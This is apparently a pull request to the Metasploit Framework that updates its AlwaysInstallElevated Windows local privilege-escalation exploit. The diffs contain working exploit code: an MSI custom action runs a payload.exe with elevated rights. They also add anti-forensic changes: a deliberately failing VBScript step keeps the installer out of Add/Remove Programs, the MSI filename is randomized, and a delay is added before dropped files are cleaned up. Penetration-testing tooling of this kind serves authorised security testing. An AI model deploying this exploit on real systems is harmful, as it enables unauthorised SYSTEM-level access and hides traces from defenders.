### PR TITLE
Updates to AlwaysInstallElevated Local Priv Esc

### DIFF
--- a/external/source/exploits/exec_payload_msi/compiling.txt
+++ b/external/source/exploits/exec_payload_msi/compiling.txt
@@ -1,0 +1,4 @@
+Compile using WiX: http://wixtoolset.org
+
+candle exec_payload.wxs
+light exec_payload.wixobj

--- a/external/source/exploits/exec_payload_msi/exec_payload.wxs
+++ b/external/source/exploits/exec_payload_msi/exec_payload.wxs
@@ -14,7 +14,9 @@
 	</Directory>
 	
 	<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
-	<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
+	<CustomAction Id='ExecPayload' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
+	<!-- Attempt to launch some invalid VBS to fail the installation so no cleanup is required -->
+	<CustomAction Id='FailInstallation' Impersonate='no' Execute='deferred' Script='vbscript' Return='check'>fail</CustomAction>
 
     <Feature Id='Complete' Level='1'>
 		<ComponentRef Id='MyComponent' />
@@ -22,7 +24,8 @@
 	
 	<InstallExecuteSequence>
 		<ResolveSource After="CostInitialize" />
-		<Custom Action="ExecNotepad" After="InstallInitialize" />
+		<Custom Action="ExecPayload" After="InstallInitialize" />
+		<Custom Action="FailInstallation" Before="InstallFiles" />
 	</InstallExecuteSequence>
 
   </Product>

--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,14 +3,14 @@
 module Msf
 module Exploit::FileDropper
 
-        def initialize(info = {})
-                super
+	def initialize(info = {})
+		super
 
-                register_advanced_options(
-                        [
-                                OptInt.new( 'FileDropperDelay', [ false, 'Time, in s, to wait before attempting file cleanup' ])
-                        ], self.class)
-        end
+		register_advanced_options(
+			[
+				OptInt.new( 'FileDropperDelay', [ false, 'Time, in s, to wait before attempting file cleanup' ])
+			], self.class)
+	end
 
 	#
 	# When a new session is created, attempt to delete any files that the
@@ -98,10 +98,10 @@ module Exploit::FileDropper
 
 		if respond_to?(:file_rm)
 			delay = datastore['FileDropperDelay']
-		        if delay
+			if delay
 				print_status("Waiting #{delay}s before file cleanup...")
-        	                select(nil,nil,nil,delay)
-	                end
+				select(nil,nil,nil,delay)
+			end
 
 			@dropped_files.delete_if do |file|
 				begin

--- a/lib/msf/core/exploit/file_dropper.rb
+++ b/lib/msf/core/exploit/file_dropper.rb
@@ -3,6 +3,15 @@
 module Msf
 module Exploit::FileDropper
 
+        def initialize(info = {})
+                super
+
+                register_advanced_options(
+                        [
+                                OptInt.new( 'FileDropperDelay', [ false, 'Time, in s, to wait before attempting file cleanup' ])
+                        ], self.class)
+        end
+
 	#
 	# When a new session is created, attempt to delete any files that the
 	# exploit created.
@@ -88,6 +97,12 @@ module Exploit::FileDropper
 		end
 
 		if respond_to?(:file_rm)
+			delay = datastore['FileDropperDelay']
+		        if delay
+				print_status("Waiting #{delay}s before file cleanup...")
+        	                select(nil,nil,nil,delay)
+	                end
+
 			@dropped_files.delete_if do |file|
 				begin
 					file_rm(file)

--- a/modules/exploits/windows/local/always_install_elevated.rb
+++ b/modules/exploits/windows/local/always_install_elevated.rb
@@ -29,10 +29,9 @@ class Metasploit3 < Msf::Exploit::Local
 
 				The default MSI file is data/exploits/exec_payload.msi with the WiX source file
 				under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
-				executes payload.exe within the same folder.
-
-				The MSI may not execute succesfully successive times, but may be able to get around
-				this by regenerating the MSI.
+				executes payload.exe within the same folder then attempts to run some invalid
+				VBS to force the installer to fail. This prevents it being registered as
+				installed software.
 
 				MSI can be rebuilt from the source using the WIX tool with the following commands:
 				candle exec_payload.wxs
@@ -41,8 +40,9 @@ class Metasploit3 < Msf::Exploit::Local
 			'License'       => MSF_LICENSE,
 			'Author'        =>
 				[
-					'Ben Campbell',
-					'Parvez Anwar' # discovery?/inspiration
+					'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
+					'Parvez Anwar', # discovery?/inspiration
+					'Michael Schierl <schierlm[at]gmx[dot]de>' # Feedback/MSI failure improvement
 				],
 			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
 			'Platform'      => [ 'win' ],

--- a/modules/exploits/windows/local/always_install_elevated.rb
+++ b/modules/exploits/windows/local/always_install_elevated.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Local
 			'DefaultOptions' =>
 				{
 					'WfsDelay' => 10,
-					'EXITFUNC' => 'thread',
+					'FileDropperDelay' => 10,
 					'InitialAutoRunScript' => 'migrate -k -f'
 				},
 			'Targets'       =>
@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Local
 			return
 		end
 
-		msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
+		msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
 		msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
 
 		# Upload MSI


### PR DESCRIPTION
Taking on @schierlm 's feedback to force the installer to fail installation so cleanup isn't required. After installation there should be nothing added in Add/Remove Programs.

 https://github.com/rapid7/metasploit-framework/pull/1090

I have added some failing VBScript to the installer so the MSI will need recompiling.

I have added an advanced option to the FileDropper exploit class to allow for a delay on cleaning up of files. This allows time for the exploit to migrate so clean-up of the payload can occur successfully.
